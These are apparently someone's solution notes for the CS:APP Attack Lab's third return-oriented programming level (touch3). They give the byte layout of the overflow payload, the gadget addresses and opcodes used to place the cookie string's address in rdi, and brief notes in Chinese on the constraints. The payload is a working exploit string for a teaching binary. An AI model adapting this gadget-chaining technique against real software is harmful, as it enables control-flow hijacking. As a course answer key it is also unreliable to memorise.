00 00 00 00 00 40 18 fa (touch3)
00 00 00 00 00 40 19 c5 (address8)
00 00 00 00 00 40 19 d6 (address7)

00 00 00 00 00 40 1a 13 (address6)
00 00 00 00 00 40 1a 69 (address5)
00 00 00 00 00 40 19 dd (address4)
00 00 00 00 00 00 00 10 [esi] (16)
00 00 00 00 00 40 19 cc (address3)

00 00 00 00 00 40 1a 00 (AMAZING!!!)
61 66 37 39 39 62 39 35 [cookie]
00 00 00 00 00 40 19 cc (address3)

00 00 00 00 00 40 19 c5 (address2) [rdi]
00 00 00 00 00 40 1a ad (address1)

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

1: mov %rsp,%rax; ret; 	48 89 e0 --> 0x401aad
2: mov %rax,%rdi; ret;  48 89 c7 --> 0x4019c5
3: pop %rax; ret;	58	 --> 0x4019cc
A: ...
3: pop %rax; ret;	58	 --> 0x4019cc
4: mov %eax,%edx; ret;	89 c2	 --> 0x4019dd
5: mov %edx,%ecx; ret;	89 d1	 --> 0x401a69
6: mov %ecx,%esi; ret;  89 ce 90 90 (lea    -0x6f6f3177(%rdi),%eax) --> 0x401a13
7: lea (%rdi,%rsi,1),%rax; ret;	 --> 0x4019d6
8: mov %rax,%rdi; ret;	48 89 c7 --> 0x4019c5



cookie: 35 39 62 39 39 37 66 61 00


start_farm:

一些困难：
	1. rsp最多增加8
	2. rsi无法赋值
一些必要性：
	1. cookie不在touch3及下面3行
	2. 必须将rsp给到rdi, 只能用mov
